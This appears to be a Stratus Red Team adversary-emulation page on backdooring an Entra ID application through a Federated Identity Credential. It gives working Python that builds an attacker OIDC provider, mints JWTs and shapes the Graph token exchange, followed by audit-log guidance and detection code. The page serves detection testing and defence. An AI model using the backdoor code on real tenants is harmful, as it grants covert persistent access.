
Backdoor Entra ID application with Federated Identity Credential (FIC)

Platform: Entra ID

Mappings

  • MITRE ATT&CK
    • Persistence
    • Privilege Escalation

Description

Backdoors an existing Entra ID application by creating a new Federated Identity Credential (FIC) that trusts an attacker-controlled OIDC provider. Once the FIC exists, any JWT signed by that provider whose issuer, subject and audience match the FIC can be exchanged at the Microsoft identity platform for an access token as the application's service principal. No client secret or certificate is added to the application, so the backdoor does not show up in its passwordCredentials or keyCredentials.

Warm-up:

  • Create a victim Entra ID application and associated service principal
  • Assign it the Directory Readers role at the tenant level (for illustration purposes)
  • Create an Azure Storage account to host the attacker-controlled OIDC provider metadata

Detonation:

  • Generate a keypair to use for OIDC
  • Upload OIDC discovery document and JWKS to the storage account
  • Add a Federated Identity Credential (FIC) to the victim application that trusts tokens issued by the malicious OIDC provider
  • Create a JWT signed by the attacker's OIDC private key whose iss, sub and aud claims match the issuer, subject and audience registered in the FIC
  • Exchange that JWT, as a client assertion in a client_credentials request, for a Microsoft Graph token as the victim application
  • Display the victim application's access token to the user
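The detonation steps above, as an added example that is not Stratus Red Team's code: it generates the OIDC signing key, produces the discovery document and JWKS that would be uploaded to the storage account, mints the assertion, shapes the token request, and re-implements the check Entra ID makes against the FIC so the whole flow can be verified offline. RS256 is implemented in pure Python for that reason; the issuer URL, tenant and client ids are constructed placeholders and the jwks_uri path is an assumption.

```python
# Added example (not Stratus Red Team's code). Attacker-side OIDC provider for a
# FIC backdoor, end to end, with RSA/RS256 in pure Python so it runs offline.
import base64, hashlib, json, math, random, secrets, time

ISSUER = "https://attacker-storage.blob.core.windows.net/oidc"  # placeholder issuer
FIC = {"issuer": ISSUER, "subject": "stratus-red-team-oidc",      # what gets registered
       "audiences": ["api://AzureADTokenExchange"]}              # Entra's default audience
KID = "backdoor-key-1"
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # PKCS#1 v1.5 prefix

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin, adequate for a throwaway signing key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(bits: int) -> int:
    while True:
        c = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # top bit set, odd
        if is_probable_prime(c):
            return c

def generate_rsa_key(bits: int = 1024) -> dict:
    """Returns {n, e, d}; 1024 bits keeps pure-Python generation fast for the demo."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and math.gcd(e, phi) == 1:
            return {"n": n, "e": e, "d": pow(e, -1, phi)}

def pkcs1_v15_encode(n: int, msg: bytes) -> int:
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rs256_sign(key: dict, msg: bytes) -> bytes:
    k = (key["n"].bit_length() + 7) // 8
    return pow(pkcs1_v15_encode(key["n"], msg), key["d"], key["n"]).to_bytes(k, "big")

def rs256_verify(jwk: dict, msg: bytes, sig: bytes) -> bool:
    n = int.from_bytes(b64url_decode(jwk["n"]), "big")
    e = int.from_bytes(b64url_decode(jwk["e"]), "big")
    return pow(int.from_bytes(sig, "big"), e, n) == pkcs1_v15_encode(n, msg)

def provider_documents(key: dict) -> dict:
    """The two static files uploaded to the storage account (jwks path is an assumption)."""
    uint = lambda v: b64url(v.to_bytes((v.bit_length() + 7) // 8, "big"))
    jwks = {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": KID,
                      "n": uint(key["n"]), "e": uint(key["e"])}]}
    discovery = {"issuer": ISSUER, "jwks_uri": ISSUER + "/.well-known/jwks.json",
                 "response_types_supported": ["id_token"], "subject_types_supported": ["public"],
                 "id_token_signing_alg_values_supported": ["RS256"]}
    return {".well-known/openid-configuration": discovery, ".well-known/jwks.json": jwks}

def mint_assertion(key: dict, now: int) -> str:
    """JWT whose iss/sub/aud match the FIC; that is what Entra ID matches on."""
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    header = {"alg": "RS256", "typ": "JWT", "kid": KID}
    claims = {"iss": FIC["issuer"], "sub": FIC["subject"], "aud": FIC["audiences"][0],
              "iat": now, "nbf": now, "exp": now + 300, "jti": secrets.token_hex(16)}
    signing_input = enc(header) + "." + enc(claims)
    return signing_input + "." + b64url(rs256_sign(key, signing_input.encode()))

def token_exchange_request(tenant_id: str, client_id: str, assertion: str) -> dict:
    """client_credentials grant presenting the OIDC token as the client assertion."""
    return {"url": f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token",
            "form": {"client_id": client_id, "grant_type": "client_credentials",
                     "scope": "https://graph.microsoft.com/.default",
                     "client_assertion_type": "urn:ietf:params:oauth:client-assertion-type:jwt-bearer",
                     "client_assertion": assertion}}

def accepted_by_fic(assertion: str, jwks: dict, fic: dict, now: int) -> bool:
    """Mirror of Entra's check: signature against the issuer's JWKS, then exact
    match of issuer, subject and audience against the registered FIC."""
    h, c, s = assertion.split(".")
    header, claims = json.loads(b64url_decode(h)), json.loads(b64url_decode(c))
    jwk = next((k for k in jwks["keys"] if k["kid"] == header.get("kid")), None)
    if jwk is None or header.get("alg") != "RS256":
        return False
    if not rs256_verify(jwk, f"{h}.{c}".encode(), b64url_decode(s)):
        return False
    return (claims["iss"] == fic["issuer"] and claims["sub"] == fic["subject"]
            and claims["aud"] in fic["audiences"] and claims["nbf"] <= now < claims["exp"])

if __name__ == "__main__":
    key, now = generate_rsa_key(), int(time.time())
    docs = provider_documents(key)
    assertion = mint_assertion(key, now)
    print(json.dumps(docs, indent=2))
    print(json.dumps(token_exchange_request("<tenant-id>", "<client-id>", assertion), indent=2))
    print("accepted by FIC:", accepted_by_fic(assertion, docs[".well-known/jwks.json"], FIC, now))
```

The check in accepted_by_fic is deliberately thin: Entra ID fetches the JWKS from the issuer's discovery document, validates the signature, and compares iss, sub and aud with the FIC. Nothing else about the attacker's provider is vetted, which is why control over the issuer URL is sufficient for persistence.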


Instructions

Detonate with Stratus Red Team
stratus detonate entra-id.persistence.backdoor-application-fic

Detection

Using Entra ID audit logs. Adding a FIC does not produce its own activity type; it is logged as Update application (category ApplicationManagement, logged by Core Directory) with a modifiedProperties entry whose displayName is FederatedIdentityCredentials. The oldValue and newValue fields are JSON-encoded strings holding the application's full FIC list before and after the change, so diff them to find the credential that was added and inspect its Issuer, Subject and Audiences. Legitimate FICs point at well-known issuers (for example GitHub Actions, or the login.microsoftonline.com issuer of a managed identity); an issuer hosted on an arbitrary storage account or other attacker-controllable domain, as in the sample below, is a strong signal. Because a FIC adds nothing to the application's passwordCredentials or keyCredentials, detections that only watch for new secrets or certificates miss it. To hunt for existing backdoors, enumerate each application's FICs with the Microsoft Graph endpoint GET /applications/{id}/federatedIdentityCredentials and review any issuer you do not recognize.

Sample Entra ID audit log event to monitor:

{
  "category": "ApplicationManagement",
  "result": "success",
  "activityDisplayName": "Update application",
  "loggedByService": "Core Directory",
  "operationType": "Update",
  "targetResources": [
    {
      "id": "[REMOVED]",
      "displayName": "Stratus Red Team FIC application ly1h",
      "type": "Application",
      "userPrincipalName": null,
      "groupType": null,
      "modifiedProperties": [
        {
          "displayName": "FederatedIdentityCredentials",
          "oldValue": "[]",
          "newValue": "[{\"Name\":\"stratus-red-team-oidc-fic-ly1h\",\"Issuer\":\"https://stratusficapply1h.blob.core.windows.net/oidc\",\"Subject\":\"stratus-red-team-oidc\",\"Id\":\"[REMOVED]\",\"Description\":\"stratus-red-team-oidc-fic-ly1h\",\"Audiences\":[\"api://AzureADTokenExchange\"],\"ClaimsMatchingExpressionValue\":null,\"ClaimsMatchingExpressionLanguageVersion\":0,\"EncodingVersion\":2,\"TrustedIssuer\":null}]"
        },
        {
          "displayName": "Included Updated Properties",
          "oldValue": null,
          "newValue": "\"FederatedIdentityCredentials\""
        }
      ]
    }
  ]
}
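Detection logic for the event above, as an added example that is not Stratus Red Team's code: it extracts the FederatedIdentityCredentials change from modifiedProperties, diffs the old and new FIC lists to isolate what was added, and flags any new credential whose issuer is outside an allowlist. The two audit events and the allowlist of issuer prefixes are constructed for the example; the GUIDs and initiatedBy values are placeholders and the allowlist must be tuned to your own environment.

```python
# Added example (not Stratus Red Team's code): flag FICs added to applications
# whose issuer is not an expected identity provider.
import json

# Issuer prefixes considered expected in this environment (assumption; tune to taste).
KNOWN_ISSUER_PREFIXES = (
    "https://token.actions.githubusercontent.com",  # GitHub Actions
    "https://login.microsoftonline.com/",           # managed identities / other tenants
)

def _fic_list(raw) -> dict:
    """Parse the JSON-encoded FIC list from oldValue/newValue, keyed by Id (Name as fallback)."""
    return {f.get("Id") or f["Name"]: f for f in json.loads(raw or "[]")}

def added_fics(event: dict) -> list:
    """FICs added by a successful 'Update application' audit event, with context."""
    findings = []
    if event.get("activityDisplayName") != "Update application" or event.get("result") != "success":
        return findings
    for target in event.get("targetResources", []):
        if target.get("type") != "Application":
            continue
        for prop in target.get("modifiedProperties", []):
            if prop.get("displayName") != "FederatedIdentityCredentials":
                continue
            old, new = _fic_list(prop.get("oldValue")), _fic_list(prop.get("newValue"))
            for fid, fic in new.items():
                if fid not in old:
                    findings.append({"application": target.get("displayName"),
                                     "app_object_id": target.get("id"),
                                     "name": fic.get("Name"), "issuer": fic.get("Issuer", ""),
                                     "subject": fic.get("Subject"), "audiences": fic.get("Audiences"),
                                     "initiated_by": event.get("initiatedBy")})
    return findings

def is_suspicious(finding: dict, known_prefixes=KNOWN_ISSUER_PREFIXES) -> bool:
    """A new FIC trusting an issuer outside the allowlist is worth an alert."""
    return not any(finding["issuer"].startswith(p) for p in known_prefixes)

def alerts(events: list) -> list:
    return [f for e in events for f in added_fics(e) if is_suspicious(f)]

# Constructed event mirroring the sample above, with placeholder ids and actor.
ATTACK_EVENT = {
    "category": "ApplicationManagement", "result": "success",
    "activityDisplayName": "Update application", "loggedByService": "Core Directory",
    "operationType": "Update",
    "initiatedBy": {"user": {"userPrincipalName": "attacker@example.invalid"}},
    "targetResources": [{
        "id": "11111111-1111-1111-1111-111111111111",
        "displayName": "Stratus Red Team FIC application ly1h", "type": "Application",
        "modifiedProperties": [
            {"displayName": "FederatedIdentityCredentials", "oldValue": "[]",
             "newValue": json.dumps([{"Name": "stratus-red-team-oidc-fic-ly1h",
                                      "Issuer": "https://stratusficapply1h.blob.core.windows.net/oidc",
                                      "Subject": "stratus-red-team-oidc",
                                      "Id": "22222222-2222-2222-2222-222222222222",
                                      "Audiences": ["api://AzureADTokenExchange"]}])},
            {"displayName": "Included Updated Properties", "oldValue": None,
             "newValue": "\"FederatedIdentityCredentials\""}]}]}

# Constructed benign event: a CI pipeline's GitHub Actions FIC being added.
BENIGN_EVENT = {
    "category": "ApplicationManagement", "result": "success",
    "activityDisplayName": "Update application", "operationType": "Update",
    "initiatedBy": {"user": {"userPrincipalName": "platform-admin@example.invalid"}},
    "targetResources": [{"id": "33333333-3333-3333-3333-333333333333",
                         "displayName": "deploy-pipeline", "type": "Application",
                         "modifiedProperties": [{"displayName": "FederatedIdentityCredentials",
                                                 "oldValue": "[]",
                                                 "newValue": json.dumps([{"Name": "gh-main", "Id": "4444",
                                                                          "Issuer": "https://token.actions.githubusercontent.com",
                                                                          "Subject": "repo:example/app:ref:refs/heads/main",
                                                                          "Audiences": ["api://AzureADTokenExchange"]}])}]}]}

if __name__ == "__main__":
    for a in alerts([ATTACK_EVENT, BENIGN_EVENT]):
        print(json.dumps(a, indent=2))
```

Diffing oldValue against newValue matters: newValue always carries the application's complete FIC list, so an application that legitimately has a GitHub Actions FIC would otherwise re-trigger the rule every time an unrelated credential is added or removed.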